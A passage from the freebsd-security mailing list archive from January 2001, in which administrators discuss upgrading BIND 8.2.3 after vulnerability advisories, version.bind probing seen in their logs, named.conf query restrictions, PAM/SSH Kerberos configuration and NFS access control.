Of Kris Kennaway Sent: Monday, January 29, 2001 5:26 PM To: Remy Wisaksono Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? On Mon, Jan 29, 2001 at 08:02:11PM -0500, Remy Wisaksono wrote: > > I upgraded my bind8.2.3-T6B and when typing > "named -v" command, I get the 8.2.3-T6B ver. > > When typing the following comman, > "nslookup -q=txt -class=CHAOS version.bind. 0" > I got; > VERSION.BIND text = "8.2.3-REL" > > (also I did check my log file ....everyting looks good now.) Well, it seems you didn't actually upgrade it properly :-) Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 14: 0:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from merton.slipstreams.net (owirc.com [208.45.226.107]) by hub.freebsd.org (Postfix) with ESMTP id 209A237B6B4 for ; Tue, 30 Jan 2001 14:00:24 -0800 (PST) Received: from cc481952a (arcane.slipstreams.net [192.168.1.1]) by merton.slipstreams.net (8.11.1/8.11.1) with SMTP id f0UE88q80963 for ; Tue, 30 Jan 2001 14:08:09 GMT (envelope-from kupek@earthlink.net) From: "Scott Hilton" To: Subject: RE: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? Date: Tue, 30 Jan 2001 14:00:09 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org heh.. it would help if I actually bothered to read all of the new messages in my box before posting this... As Kris mentioned in a different thread, the bind port has also been updated as well (duh). Scott -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Scott Hilton Sent: Tuesday, January 30, 2001 1:56 PM To: Kris Kennaway Cc: freebsd-security@FreeBSD.ORG Subject: RE: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? To those that want to upgrade to 8.2.3-REL before the official FreeBSD advisories are released, if you are already running 4.2-STABLE, its only a matter of uncompressing the tarball from ftp.isc.org, and doing a 'make install'. There don't appear to be any conflicts with any pathnames changing (at least none that I could see). Scott -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Kris Kennaway Sent: Monday, January 29, 2001 5:26 PM To: Remy Wisaksono Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? On Mon, Jan 29, 2001 at 08:02:11PM -0500, Remy Wisaksono wrote: > > I upgraded my bind8.2.3-T6B and when typing > "named -v" command, I get the 8.2.3-T6B ver. > > When typing the following comman, > "nslookup -q=txt -class=CHAOS version.bind. 0" > I got; > VERSION.BIND text = "8.2.3-REL" > > (also I did check my log file ....everyting looks good now.) Well, it seems you didn't actually upgrade it properly :-) Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 14:47:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from cowpie.acm.vt.edu (cowpie.acm.vt.edu [128.173.42.253]) by hub.freebsd.org (Postfix) with ESMTP id A30EB37B6CB for ; Tue, 30 Jan 2001 14:46:53 -0800 (PST) Received: (from dlacroix@localhost) by cowpie.acm.vt.edu (8.9.3/8.9.3) id RAA12443; Tue, 30 Jan 2001 17:45:04 -0500 (EST) From: David La Croix Message-Id: <200101302245.RAA12443@cowpie.acm.vt.edu> Subject: Bind: unapproved query (version.bind) Script kiddies? To: freebsd-security@freebsd.org Date: Tue, 30 Jan 2001 16:45:04 -0600 (CST) X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I just noticed the following in my logfiles: (/var/log/messages) it was running Bind 8.2.2- Jan 26 22:37:43 mildred named[41908]: unapproved query from [208.44.147.11].1584 for "version.bind" [repeat 23 more times from the same IP] Jan 27 01:44:42 mildred named[41908]: unapproved query from [208.139.163.15].273 4 for "version.bind" [repeat 32 more times from the same IP] Could this be script kiddie activity? This was before I upgraded to 8.2.3, and before the CERT alert came out. What I don't get is why the unapproved query repeated so many times, within (according to the timestamp) 3 seconds on both occasions. I will note: this activity goes back through about November of 2000, seemingly from different IP addresses. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 14:52:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.epylon.com (sf-gw.epylon.com [63.93.9.98]) by hub.freebsd.org (Postfix) with ESMTP id 675CC37B6B7 for ; Tue, 30 Jan 2001 14:52:10 -0800 (PST) Received: by goofy.epylon.lan with Internet Mail Service (5.5.2653.19) id ; Tue, 30 Jan 2001 14:52:09 -0800 Message-ID: <657B20E93E93D4118F9700D0B73CE3EA0243C6@goofy.epylon.lan> From: Jason DiCioccio To: 'David La Croix' , freebsd-security@freebsd.org Subject: RE: Bind: unapproved query (version.bind) Script kiddies? Date: Tue, 30 Jan 2001 14:52:00 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C08B0F.41411B10" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_000_01C08B0F.41411B10 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C08B0F.41411B10" ------_=_NextPart_001_01C08B0F.41411B10 Content-Type: text/plain; charset="iso-8859-1" -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I would say it definitely is ;) - ------- Jason DiCioccio Evil Genius Unix BOFH mailto:jasond@epylon.com 415-593-2761 Direct & Fax 415-593-2900 Main Epylon Corporation 645 Harrison Street, Suite 200 San Francisco, CA 94107 www.epylon.com BSD is for people who love Unix - Linux is for people who hate Microsoft - -----Original Message----- From: David La Croix [mailto:dlacroix@cowpie.acm.vt.edu] Sent: Tuesday, January 30, 2001 2:45 PM To: freebsd-security@freebsd.org Subject: Bind: unapproved query (version.bind) Script kiddies? I just noticed the following in my logfiles: (/var/log/messages) it was running Bind 8.2.2- Jan 26 22:37:43 mildred named[41908]: unapproved query from [208.44.147.11].1584 for "version.bind" [repeat 23 more times from the same IP] Jan 27 01:44:42 mildred named[41908]: unapproved query from [208.139.163.15].273 4 for "version.bind" [repeat 32 more times from the same IP] Could this be script kiddie activity? This was before I upgraded to 8.2.3, and before the CERT alert came out. What I don't get is why the unapproved query repeated so many times, within (according to the timestamp) 3 seconds on both occasions. I will note: this activity goes back through about November of 2000, seemingly from different IP addresses. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.8 for non-commercial use iQA/AwUBOndF+lCmU62pemyaEQKsYACfcnTlUi0GdcPNeUKQjUH9xTmuEAIAoN5d E4BOnNGyRLlPVJpAirsY7PbT =1Vpf -----END PGP SIGNATURE----- ------_=_NextPart_001_01C08B0F.41411B10 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable RE: Bind: unapproved query (version.bind) Script = kiddies?

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I would say it definitely is ;)


- -------
Jason DiCioccio
Evil Genius
Unix BOFH

mailto:jasond@epylon.com

415-593-2761        &nb= sp; Direct & Fax
415-593-2900        &nb= sp; Main

Epylon Corporation
645 Harrison Street, Suite 200
San Francisco, CA 94107
www.epylon.com

BSD is for people who love Unix -
Linux is for people who hate Microsoft


- -----Original Message-----
From: David La Croix [mailto:dlacroix@cowpie.acm.vt= .edu]
Sent: Tuesday, January 30, 2001 2:45 PM
To: freebsd-security@freebsd.org
Subject: Bind: unapproved query (version.bind) = Script kiddies?


I just noticed the following in my logfiles: = (/var/log/messages)

it was running Bind 8.2.2-

Jan 26 22:37:43 mildred named[41908]: unapproved = query from
[208.44.147.11].1584
 for "version.bind"
[repeat 23 more times from the same IP]

Jan 27 01:44:42 mildred named[41908]: unapproved = query from
[208.139.163.15].273
4 for "version.bind"
[repeat 32 more times from the same IP]

Could this be script kiddie activity?  This was = before I upgraded to
8.2.3,
and before the CERT alert came out.

What I don't get is why the unapproved query repeated = so many times,
within
(according to the timestamp) 3 seconds on both = occasions.

I will note:  this activity goes back through = about November of 2000,
seemingly from different IP addresses.


To Unsubscribe: send mail to = majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the = body of the message

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use = <http://www.pgp.com>

iQA/AwUBOndF+lCmU62pemyaEQKsYACfcnTlUi0GdcPNeUKQjUH9xTmuEAIAoN5= d
E4BOnNGyRLlPVJpAirsY7PbT
=3D1Vpf
-----END PGP SIGNATURE-----

  ------_=_NextPart_001_01C08B0F.41411B10-- ------_=_NextPart_000_01C08B0F.41411B10 Content-Type: application/octet-stream; name="Jason DiCioccio.vcf" Content-Disposition: attachment; filename="Jason DiCioccio.vcf" BEGIN:VCARD VERSION:2.1 N:DiCioccio;Jason FN:Jason DiCioccio ORG:epylon.com;operations TITLE:UNIX ADMIN ADR;WORK:;;645 Harrison St;San Francisco;CA;94107;usa LABEL;WORK;ENCODING=QUOTED-PRINTABLE:645 Harrison St=0D=0ASan Francisco, CA 94107=0D=0Ausa EMAIL;PREF;INTERNET:Jason.DiCioccio@Epylon.com REV:19990105T135529Z END:VCARD ------_=_NextPart_000_01C08B0F.41411B10-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 15:34:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from cowpie.acm.vt.edu (cowpie.acm.vt.edu [128.173.42.253]) by hub.freebsd.org (Postfix) with ESMTP id 73F8037B6D7 for ; Tue, 30 Jan 2001 15:34:33 -0800 (PST) Received: (from dlacroix@localhost) by cowpie.acm.vt.edu (8.9.3/8.9.3) id SAA12914; Tue, 30 Jan 2001 18:32:42 -0500 (EST) From: David La Croix Message-Id: <200101302332.SAA12914@cowpie.acm.vt.edu> Subject: Re: Bind: unapproved query (version.bind) Script kiddies? In-Reply-To: <3A7745E9.ABA027AD@ursine.com> from Michael Bryan at "Jan 30, 1 02:53:29 pm" To: fbsd-secure@ursine.com (Michael Bryan) Date: Tue, 30 Jan 2001 17:32:42 -0600 (CST) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Almost certainly script kiddies looking to find vulnerable versions of BIND. > It might be related to the pre-8.2.3 bugs, or it might be earlier bugs that > they're looking for. Certainly anything before a week or two ago is most likely > somebody looking for one of the earlier bugs. > > Out of curiousity, what do you have setup in named.conf (or elsewhere) to block > queries for version.bind? It's not so much blocking queries to version.bind, so much as refusing to answer queries to an untrusted host, about domains it does not host. options { directory "/etc/namedb"; allow-query { 127.0.0.1; localnets; }; allow-transfer { 0.0.0.0; /* IPs changed */ 0.0.0.0; /* secondary DNS servers */ }; forwarders { 0.0.0.0; 0.0.0.0; }; }; and then further down all my zone definitions look like: zone "mydomain.com" { type master; file "zones/mydomain.com"; allow-query { any; }; }; Basically: refuse queries for any domains I'm not master or slave for, and only allow domain transfers to the known/trusted secondary nameservers for my domains. (as far as you can trust based on IP address) I'm sure others have even more restrictive setups that work. (require keys to do zone transfers, listen on only one IP address, etc) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 16:31:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 5A8A637B6A1; Tue, 30 Jan 2001 16:30:59 -0800 (PST) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.11.1/8.11.1) with SMTP id f0V0UvB29344; Tue, 30 Jan 2001 19:30:58 -0500 (EST) (envelope-from robert@fledge.watson.org) Date: Tue, 30 Jan 2001 19:30:57 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org To: green@FreeBSD.org Cc: security@FreeBSD.org Subject: PAM/SSH and KerberosIV? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I notice that as part of the PAM/OpenSSH support, the following lines were added to the pam.conf on -STABLE: # OpenSSH with PAM support requires similar modules. The session one is # a bit strange, though... sshd auth sufficient pam_skey.so sshd auth required pam_unix.so try_first_pass sshd session required pam_permit.so For most sets of entries, there's also a kerberos line (witness login): # If the user can authenticate with S/Key, that's sufficient; allow clear # password. Try kerberos, then try plain unix password. login auth sufficient pam_skey.so login auth requisite pam_cleartext_pass_ok.so #login auth sufficient pam_kerberosIV.so try_first_pass login auth required pam_unix.so try_first_pass Which gets un-commented for Kerberos sites. Could you comment on whether or not a similar looking line is required for use with KerberosIV and OpenSSH? Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 16:50:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from green.dyndns.org (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 3E5BC37B6A6; Tue, 30 Jan 2001 16:50:09 -0800 (PST) Received: from localhost (3839c5@localhost [127.0.0.1]) by green.dyndns.org (8.11.1/8.11.1) with ESMTP id f0V0n1f15852; Tue, 30 Jan 2001 19:49:02 -0500 (EST) (envelope-from green@FreeBSD.org) Message-Id: <200101310049.f0V0n1f15852@green.dyndns.org> X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 To: Robert Watson Cc: green@FreeBSD.org, security@FreeBSD.org Subject: Re: PAM/SSH and KerberosIV? In-Reply-To: Message from Robert Watson of "Tue, 30 Jan 2001 19:30:57 EST." From: "Brian F. Feldman" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 30 Jan 2001 19:49:01 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert Watson wrote: > > I notice that as part of the PAM/OpenSSH support, the following lines were > added to the pam.conf on -STABLE: > > # OpenSSH with PAM support requires similar modules. The session one is > # a bit strange, though... > sshd auth sufficient pam_skey.so > sshd auth required pam_unix.so try_first_pass > sshd session required pam_permit.so > > For most sets of entries, there's also a kerberos line (witness login): > > # If the user can authenticate with S/Key, that's sufficient; allow clear > # password. Try kerberos, then try plain unix password. > login auth sufficient pam_skey.so > login auth requisite pam_cleartext_pass_ok.so > #login auth sufficient pam_kerberosIV.so try_first_pass > login auth required pam_unix.so try_first_pass > > Which gets un-commented for Kerberos sites. Could you comment on whether > or not a similar looking line is required for use with KerberosIV and > OpenSSH? I don't know. I do not have the capacity to test Kerberos without going through the trouble of setting it up for only myself only on my own computer, which would be an exercise in utterly profound useless effort. So, anyone who does it, let me know if it works for you and how. BTW, you ever test the make-ssh-use-/dev/tty-to-ask-for-OTP patch? -- Brian Fundakowski Feldman \ FreeBSD: The Power to Serve! / green@FreeBSD.org `------------------------------' To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 17:10:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from vexpert.dbai.tuwien.ac.at (vexpert.dbai.tuwien.ac.at [128.130.111.12]) by hub.freebsd.org (Postfix) with ESMTP id 1911637B6A9 for ; Tue, 30 Jan 2001 17:10:24 -0800 (PST) Received: from deneb.dbai.tuwien.ac.at (deneb [128.130.111.2]) by vexpert.dbai.tuwien.ac.at (8.11.1/8.11.1) with ESMTP id f0V1ALe05845; Wed, 31 Jan 2001 02:10:21 +0100 (MET) Received: from localhost (pfeifer@localhost) by deneb.dbai.tuwien.ac.at (8.11.1/8.11.1) with ESMTP id f0V1AJX75052; Wed, 31 Jan 2001 02:10:20 +0100 (CET) (envelope-from pfeifer@dbai.tuwien.ac.at) X-Authentication-Warning: deneb.dbai.tuwien.ac.at: pfeifer owned process doing -bs Date: Wed, 31 Jan 2001 02:10:19 +0100 (CET) From: Gerald Pfeifer To: Cc: Subject: nfsd lacks support for tcp_wrapper Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Unless we completely missed something, nfsd does lack support for tcp_wrapper, doesn't it? As NFS is a rather critical security-wize this seems like a big omission. (Many sites, like ours, just cannot avoid using NFS, so it would be nice to be able to easily restrict the address range clients are allowed to connect from.) Or are we just missing something? Gerald -- Gerald "Jerry" pfeifer@dbai.tuwien.ac.at http://www.dbai.tuwien.ac.at/~pfeifer/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 17:26:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 2471737B69F for ; Tue, 30 Jan 2001 17:26:22 -0800 (PST) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f0V1QIr16622; Tue, 30 Jan 2001 17:26:18 -0800 (PST) Date: Tue, 30 Jan 2001 17:26:18 -0800 From: Alfred Perlstein To: Gerald Pfeifer Cc: freebsd-security@FreeBSD.ORG, admin@dbai.tuwien.ac.at Subject: Re: nfsd lacks support for tcp_wrapper Message-ID: <20010130172618.Y26076@fw.wintelcom.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from pfeifer@dbai.tuwien.ac.at on Wed, Jan 31, 2001 at 02:10:19AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Gerald Pfeifer [010130 17:10] wrote: > Unless we completely missed something, nfsd does lack support for > tcp_wrapper, doesn't it? > > As NFS is a rather critical security-wize this seems like a big omission. > > (Many sites, like ours, just cannot avoid using NFS, so it would be nice > to be able to easily restrict the address range clients are allowed to > connect from.) > > Or are we just missing something? Missing the fact that nfsd is an in-kernel process and therefore pretty hard to link against libwrap. Otherwise... i dunno, use ipfw? :) -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 17:38:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id A535237B6A0 for ; Tue, 30 Jan 2001 17:38:21 -0800 (PST) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id UAA58984; Tue, 30 Jan 2001 20:38:17 -0500 (EST) (envelope-from wollman) Date: Tue, 30 Jan 2001 20:38:17 -0500 (EST) From: Garrett Wollman Message-Id: <200101310138.UAA58984@khavrinen.lcs.mit.edu> To: Gerald Pfeifer Cc: freebsd-security@FreeBSD.ORG Subject: nfsd lacks support for tcp_wrapper In-Reply-To: References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Or are we just missing something? A good deal, since NFS has access-control at a higher level built in to the kernel. mountd will do the right magic to tell the kernel what your access-control list is. (Of course, if someone sniffs your mount-point file handles you're still toast.) -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 17:43:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from h-209-91-79-2.gen.cadvision.com (h-209-91-79-2.gen.cadvision.com [209.91.79.2]) by hub.freebsd.org (Postfix) with ESMTP id DBF1F37B503 for ; Tue, 30 Jan 2001 17:42:55 -0800 (PST) Received: from cirp.org (localhost [127.0.0.1]) by h-209-91-79-2.gen.cadvision.com (8.9.3/8.9.3) with ESMTP id SAA15008 for ; Tue, 30 Jan 2001 18:42:51 -0700 (MST) (envelope-from gtf@cirp.org) Message-Id: <200101310142.SAA15008@h-209-91-79-2.gen.cadvision.com> Date: Tue, 30 Jan 2001 18:42:50 -0700 (MST) From: "Geoffrey T. Falk" Subject: Re: nfsd lacks support for tcp_wrapper To: freebsd-security@FreeBSD.org In-Reply-To: MIME-Version: 1.0 Content-Type: TEXT/plain; CHARSET=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 31 Jan, Gerald Pfeifer wrote: > Unless we completely missed something, nfsd does lack support for > tcp_wrapper, doesn't it? > > As NFS is a rather critical security-wize this seems like a big omission. IP filters are always better than TCP wrappers. NFS should only be used behind a good firewall anyways. If you are paranoid about IP and DNS spoofing on the local network, don't use plain NFS... Geoffrey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 18:40:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id DE46737B67D for ; Tue, 30 Jan 2001 18:40:03 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id 3AD23BA2B4; Tue, 30 Jan 2001 18:40:34 -0800 (PST) Date: Tue, 30 Jan 2001 18:40:34 -0800 From: Kris Kennaway To: Rossen Raykov Cc: ofsenfreebsd@yahoo.com, freebsd-security@FreeBSD.ORG Subject: Re: bind8.2.3 port Message-ID: <20010130184034.E54217@xor.obsecurity.org> References: <20010130180717.62674.qmail@web9303.mail.yahoo.com> <013d01c08af3$1fd80270$4c00000a@sage> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="s9fJI615cBHmzTOP" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <013d01c08af3$1fd80270$4c00000a@sage>; from rraykov@sageian.com on Tue, Jan 30, 2001 at 02:30:38PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --s9fJI615cBHmzTOP Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Jan 30, 2001 at 02:30:38PM -0500, Rossen Raykov wrote: > VERSION.BIND text = "8.2.3-REL" > I hope this is not vulnerable. > Can someone confirm that? Yes, it's correct. You're safe! Kris --s9fJI615cBHmzTOP Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6d3shWry0BWjoQKURArRHAKCbFVfW7i9wJOJsWq2GDSLoSr8fNgCgzaYc rIe1BbP50QsxxCOOHHKWGL4= =ikIB -----END PGP SIGNATURE----- --s9fJI615cBHmzTOP-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 18:41:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 797BA37B684 for ; Tue, 30 Jan 2001 18:40:54 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id CEEC8BA2B4; Tue, 30 Jan 2001 18:41:24 -0800 (PST) Date: Tue, 30 Jan 2001 18:41:24 -0800 From: Kris Kennaway To: Omer Faruk Sen Cc: Rossen Raykov , freebsd-security@FreeBSD.ORG Subject: Re: bind8.2.3 port Message-ID: <20010130184124.F54217@xor.obsecurity.org> References: <20010130180717.62674.qmail@web9303.mail.yahoo.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="MAH+hnPXVZWQ5cD/" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010130180717.62674.qmail@web9303.mail.yahoo.com>; from ofsenfreebsd@yahoo.com on Tue, Jan 30, 2001 at 10:07:17AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --MAH+hnPXVZWQ5cD/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Jan 30, 2001 at 10:07:17AM -0800, Omer Faruk Sen wrote: > You can download that port from www.freshports.org or > www.freebsd.org/ports > But I think there is a compilation problem with it.I > am not sure but I have tried to compile that port 4 > times with the same source code.It has given me errors > everytime and all of them was in different .c > file.Weird isn't it.And after compiling it.I made a > reboot but sysctl command and some of my system > command started to give core dumps.I am not sure > bind8.2.3 port is the reason for that any feedback ??? Sounds like a hardware or general system problem. The port compiles file, but make sure you have removed any old bind-src.tar.gz and bind-doc.tar.gz files from /usr/ports/distfiles since the new version has the same filenames and you will get checksum errors which cause the build to abort. Kris --MAH+hnPXVZWQ5cD/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6d3tTWry0BWjoQKURAi0oAKDp//wR2jZ81+Qzfr1D/gETFbZD/gCfVR2O 4tWcpji2SOmk7rnSKoHXhJc= =iyJV -----END PGP SIGNATURE----- --MAH+hnPXVZWQ5cD/-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 18:42: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 6222037B698 for ; Tue, 30 Jan 2001 18:41:46 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id CBA4BBA2B4; Tue, 30 Jan 2001 18:42:16 -0800 (PST) Date: Tue, 30 Jan 2001 18:42:16 -0800 From: Kris Kennaway To: David La Croix Cc: freebsd-security@FreeBSD.ORG Subject: Re: Bind: unapproved query (version.bind) Script kiddies? Message-ID: <20010130184216.G54217@xor.obsecurity.org> References: <200101302245.RAA12443@cowpie.acm.vt.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="7LkOrbQMr4cezO2T" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200101302245.RAA12443@cowpie.acm.vt.edu>; from dlacroix@cowpie.acm.vt.edu on Tue, Jan 30, 2001 at 04:45:04PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --7LkOrbQMr4cezO2T Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jan 30, 2001 at 04:45:04PM -0600, David La Croix wrote: > I just noticed the following in my logfiles: (/var/log/messages) >=20 > it was running Bind 8.2.2- >=20 > Jan 26 22:37:43 mildred named[41908]: unapproved query from [208.44.147.1= 1].1584 > for "version.bind" > [repeat 23 more times from the same IP] Yes, they're querying you for the version of BIND you're running. Since 8.2.2 is vulnerable I suggest you update ASAP. Kris --7LkOrbQMr4cezO2T Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6d3uIWry0BWjoQKURAnF4AKDVWHzgG/m2egHi2h30gbIi6S+IEwCeLUnX mMRMa1L9CzAkRuAgjlfzGlc= =TMMB -----END PGP SIGNATURE----- --7LkOrbQMr4cezO2T-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 19:23:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.OBK.ru (ovk.barrt.ru [194.84.233.130]) by hub.freebsd.org (Postfix) with ESMTP id B67E337B699 for ; Tue, 30 Jan 2001 19:23:10 -0800 (PST) Received: from localhost (subs@localhost) by proxy.OBK.ru (8.9.3/8.9.3) with ESMTP id JAA38438 for ; Wed, 31 Jan 2001 09:23:06 +0600 (NOVT) (envelope-from subs@ovk.altai.ru) Date: Wed, 31 Jan 2001 09:23:06 +0600 (NOVT) From: "Yuri A. Wolf" X-Sender: subs@proxy.obk.ru To: freebsd-security@FreeBSD.ORG Subject: bind8.2.3 - where is the correct place to download src? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Greetings. I began to read and tried to make new bind8.2.3 from yesterday evening. All failed in different places... Today morning haven't cleared the main thing for me: 1) where is 